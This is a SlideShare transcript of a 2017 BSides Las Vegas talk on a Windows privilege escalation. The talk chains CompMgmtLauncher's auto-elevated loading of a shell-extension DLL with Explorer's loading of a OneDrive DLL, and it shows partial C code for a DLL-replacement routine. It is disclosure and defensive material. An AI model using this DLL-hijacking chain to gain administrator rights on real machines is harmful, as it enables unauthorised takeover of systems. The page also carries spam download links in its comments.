Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

How to escalate privileges to administrator in latest Windows.

1,413 views

Published on

Attackers hope getting administrator privileges always. If they had get it, they can do anything. Therefore, they try to get administrator privileges in various ways, such as account stealing, privilege escalation, UAC bypass. I have found one way to escalate privileges to administrator without using vulnerability. I hope you to see the demo, understand the mechanism, and prepare against the attacks.

Published in: Technology
  • Don't forget another good way of simplifying your writing is using external resources (such as ⇒ www.HelpWriting.net ⇐ ). This will definitely make your life more easier
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • D0WNL0AD FULL ▶ ▶ ▶ ▶ http://1lite.top/YwcfX ◀ ◀ ◀ ◀
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

How to escalate privileges to administrator in latest Windows.

  1. 1. How to escalate privileges to administrator in latest Windows. BSides Las Vegas 2017 July 25, 2017 Soya Aoyama
  2. 2. Who I am • Soya Aoyama • Fujitsu System Integration Laboratories Limited • First Presentation : AVTOKYO 2016 2
  3. 3. Do you want administrator privileges? • Steal administrator accounts • Mimikatz, PwDump, CacheDump, … • Attack system vulnerabilities • CVE-2017-0156, 0158, 0165, 0166, 0189, 0211, … • Use Windows 10 weakness • UAC bypass, IFileOperation , … 3
  4. 4. A year ago… 4 • I submitted to Microsoft's bounty program. I decided to make it in public.
  5. 5. I found… 5 • CompMgmtLauncher loads a third party DLL • Requirement : Registered in the following registry HKEY_LOCAL_MACHINE SOFTWARE Classes * shellex ContextMenuHandlers CompMgmtLauncher.exe System Process xxx.dll Third Party Program CompMgmtLauncher.exe System File 2.Escalate to Administrator 3.Load 1.Launch problem
  6. 6. Source Code 1 6 US UnregisterServer; void MaliciousProcess(WCHAR* dll) { WCHAR exe[MAX_PATH + 1] = { 0 }; WCHAR buf[MAX_PATH + 1] = { 0 }; GetModuleFileName(NULL, exe, MAX_PATH); wsprintf(buf, L"cmd.exe /k echo %s&echo %s", exe, dll); PROCESS_INFORMATION pi = { 0 }; STARTUPINFO si = { 0 }; si.cb = sizeof(si); si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_SHOWNORMAL; CreateProcess(NULL, buf, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi); } BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call,
  7. 7. Demo Video 1 7
  8. 8. During the demonstration… 8 • You need administrator privileges to access the file. I found a means to solve this issue.
  9. 9. OneDrive helps to solve the problem 9 • Explorer loads a OneDrive DLL • The OneDrive program is located in the following • You can use IFileOperation API in Explorer %UserProfile% ¥AppData ¥Local ¥Microsoft ¥OneDrive Explorer.exe System Process FileSyncShell64.dll OneDrive Program Explorer.exe System File 2.Load1.System Start problem You can access to administrator’s owned files.
  10. 10. Source Code 1 10 } void MaliciousProcess(HMODULE hModule, WCHAR* dll) { if (SECURITY_MANDATORY_HIGH_RID > GetIntegrityLevel(hModule)) { ReplaceDll(dll); ShellExecute(NULL, NULL, L"CompMgmtLauncher", NULL, NULL, SW_SHOWNORMAL); } else { WCHAR exe[MAX_PATH + 1] = { 0 }; WCHAR buf[MAX_PATH + 1] = { 0 }; GetModuleFileName(NULL, exe, MAX_PATH); wsprintf(buf, L"cmd.exe /k echo %s&echo %s", exe, dll); PROCESS_INFORMATION pi = { 0 }; STARTUPINFO si = { 0 };
  11. 11. Demo Video 2 11
  12. 12. Conclusion 12 Explorer.exe FileSyncShell64.dll CompMgmtLauncher.exe ShellExtensionX64.dll Memory OneDrive FileSyncShell64.dll WinMerge ShellExtensionX64.dll Malicious Program BSidesLV.dll Directory BSidesLV.bat CompMgmtLauncher.exe 1.Click batch file 2.Replace 3.Start System 4.Load 5.Replace 6.Start 7.Load even if individual weakness are small, but it will be very dangerous depending on the combination. Administrator
  13. 13. Bad news 13 • This fixed in Build 15063.(Creators Update) • CompMgmtLauncher still loads a third party dll. • CompMgmtLauncher does not escalate to administrator privileges. Microsoft does not want to pay me the reward.
  14. 14. Thank you 14 https://www.facebook.com/soya.aoyama.3 @SoyaAoyama https://www.slideshare.net/SoyaAoyama https://github.com/SoyaAoyama

×